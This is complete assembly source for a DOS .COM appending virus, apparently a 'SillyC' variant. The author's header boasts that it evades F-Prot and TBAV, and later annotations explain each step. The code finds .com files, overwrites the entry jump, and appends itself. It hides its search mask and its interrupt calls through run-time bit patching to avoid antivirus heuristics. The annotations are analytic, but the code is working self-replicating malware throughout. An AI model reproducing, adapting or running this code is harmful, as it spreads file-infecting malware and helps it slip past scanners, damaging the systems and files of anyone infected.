
;
; Simple COM appender destined to be another SillyC variant,
; so I'm putting the file name in as the virus name .. nuff said
;
; Unscannable (at the time of writing) by F-Prot, and by TBAV with no heuristic flags raised
; Uses a novel way of beating the S flag (presumably TBAV's search-for-executables heuristic:
; the "*.com" mask is stored with bit 7 set and decoded in place at run time, see f_string)
;
; Scans as a VCL/IVP variant with AVP/DSAV
;
; --- Analyst annotations (comments only; no code changed) -------------------
; Syntax is MASM/TASM (.model tiny, `word ptr`, `offset`, `dup`), not NASM as
; the corpus label claims.  Assembles to a DOS .COM dropper: generation 1 is
; the 3-byte jmp at `begin` followed by the body, and the "host" it restores
; is the ret/nop/nop in old_bytes, so running gen 1 simply terminates.
; Flow: locate self (delta), restore the host's first 3 bytes at CS:100h,
; set DTA, find-first "*.com" in the current directory, open the match r/w,
; read its first 3 bytes, skip it if it already starts with E9h, otherwise
; overwrite those 3 bytes with a jmp to EOF and append the body from `start`;
; close and transfer to the host via an obfuscated push 100h / ret.  Exactly
; one file is infected per run: the success path falls straight into `done`.
; Two obfuscation conventions are used throughout: the INT 21h function number
; is loaded into DH and moved into AH by `xchg ax,dx` while the DS:DX pointer
; is built in AX with LEA, and `int 0A1h` is patched to `int 21h`
; (0A1h AND 7Fh = 21h) one instruction before it executes.
.model tiny
.code
org 100h
begin:
db 0E9h                                 ; jmp near ...
dw offset start-103h                    ; ... rel16 from 103h to `start` (0 in gen 1)
start:
call delta
delta:
pop bp                                  ; bp = run-time address of `delta`
sub bp,offset delta                     ; bp = relocation delta (0 in gen 1, host_size-3 later);
                                        ; every data reference below is [bp+label]
and word ptr [begin],0                  ; clear bytes 100h..102h; absolute address on purpose,
and byte ptr [begin+2],0                ; the host entry is always at CS:100h
or ah,[old_bytes+bp]                    ; fetch saved host bytes with OR instead of MOV;
or al,[old_bytes+bp+1]                  ; NOTE(review): relies on AH/AL/BH being zero at entry,
or bh,[old_bytes+bp+2]                  ; which DOS does not guarantee for a .COM (usually true)
or byte ptr [begin],ah                  ; restore host byte 0
or byte ptr [begin+1],al                ; restore host byte 1
or byte ptr [begin+2],bh                ; restore host byte 2
and byte ptr [f_string+bp],7Fh          ; decode "*.com": stored with bit 7 set so the
and byte ptr [f_string+bp+1],7Fh        ; search mask is not visible in the file image
and byte ptr [f_string+bp+2],7Fh
and byte ptr [f_string+bp+3],7Fh
and byte ptr [f_string+bp+4],7Fh
mov dh,1ah                              ; AH=1Ah after the xchg: set DTA
lea ax,[bp+offset dta]
xchg ax,dx                              ; DS:DX = dta, AH = 1Ah
int 21h
mov dh,4eh                              ; first pass: AH=4Eh find-first
find_next:
xor cx,cx                               ; attribute mask 0 = normal files only
lea ax,[bp+offset f_string]
xchg ax,dx                              ; DS:DX = "*.com", AH = 4Eh (4Fh when re-entered)
int 21h
jc done2                                ; no (more) matches -> exit to host
mov cl,[dta+1ah+bp]                     ; low word of the file size from the DTA (dword at +1Ah);
mov ch,[dta+1bh+bp]                     ; the high word is ignored and no size ceiling is checked
sub cx,3                                ; jmp rel16 from 103h lands at 100h+size (= appended body)
mov [new_bytes+1+bp],cl                 ; patch the displacement into the new E9h header
mov [new_bytes+2+bp],ch
mov dx,3D02h                            ; AH=3Dh AL=02h: open read/write
lea ax,[bp+offset dta+1Eh]              ; ASCIIZ name from the DTA (+1Eh)
xchg ax,dx
int 21h                                 ; CF is not checked: on failure the error code in AX ...
xchg ax,bx                              ; ... is moved into BX and used as the handle below
mov dh,3fh                              ; AH=3Fh: read
mov cx,3
lea ax,[bp+offset old_bytes]
xchg ax,dx                              ; DS:DX = old_bytes
int 21h                                 ; read the host's first 3 bytes (byte count not verified)
cmp [bp+old_bytes],0E9h                 ; infection marker is just "starts with jmp near";
jne okay                                ; clean files that begin with E9h are skipped too
mov ah,3eh                              ; already infected: close ...
int 21h
mov dh,4fh                              ; ... and continue with AH=4Fh find-next
jmp find_next
done2:
jmp done                                ; trampoline, presumably because `done` is beyond
                                        ; short-jump reach of the jc at find_next
okay:
mov dx,4200h                            ; AH=42h AL=00h: lseek from start
xor cx,cx
xor ax,ax
xchg ax,dx                              ; CX:DX = 0 -> rewind to offset 0
int 21h
mov dh,40h                              ; AH=40h: write
mov cx,3
lea ax,[bp+offset new_bytes]
xchg ax,dx                              ; DS:DX = new_bytes (E9h + displacement)
and byte ptr [n1+bp+1],7fh              ; patch `int 0A1h` -> `int 21h` just before use
n1:
int 0A1h                                ; executes as int 21h: overwrite the host header
mov byte ptr [n1+bp+1],0A1h             ; re-encode n1 so the file image keeps 0A1h
mov dx,4202h                            ; AH=42h AL=02h: lseek from end
xor cx,cx
xor ax,ax
xchg ax,dx                              ; CX:DX = 0 -> seek to EOF
int 21h
mov dh,40h                              ; AH=40h: write the body
mov cx, offset theend - offset start + 56 ; code size plus data; the data below totals 55 bytes
                                        ; (3+3+42+7), the extra byte presumably covers segment
                                        ; alignment padding — verify against the assembled map
or byte ptr [f_string+bp],80h           ; re-encode "*.com" before it is written out
or byte ptr [f_string+bp+1],80h
or byte ptr [f_string+bp+2],80h
or byte ptr [f_string+bp+3],80h
or byte ptr [f_string+bp+4],80h
lea ax,[bp+offset start]
xchg ax,dx                              ; DS:DX = start (the 3-byte jmp at begin is not copied)
and byte ptr [n2+bp+1],7fh              ; patch n2 to int 21h; unlike n1 it is NOT restored, and
n2:                                     ; the write below copies memory as it is now, so every
int 0A1h                                ; generation after the first carries a plain int 21h here
mov ah,3Eh                              ; close; falls into done, so only one file per run
int 21h
done:
mov ax,101h                             ; obfuscated `push 100h / ret`: transfer to the restored
xor bx,bx                               ; host entry at CS:100h with AX=BX=CX=DX=BP=0
xchg ax,bx                              ; bx = 101h, ax = 0
xor cx,cx
dec bx                                  ; bx = 100h
xor dx,dx
push bx
xor bp,bp
xor bx,bx
ret
;danke db 'Nightwak'
theend:
.data
old_bytes db 0c3h,90h,90h               ; saved host bytes; gen-1 "host" is ret/nop/nop
new_bytes db 0E9h, 2 dup (0)            ; replacement header: jmp near, rel16 patched at run time
dta db 42 dup(0)                        ; find-first/next DTA (size at +1Ah, name at +1Eh)
f_string db '*'+80h,'.'+80h,'c'+80h,'o'+80h,'m'+80h,0,0 ; "*.com" with bit 7 set, decoded in place
end begin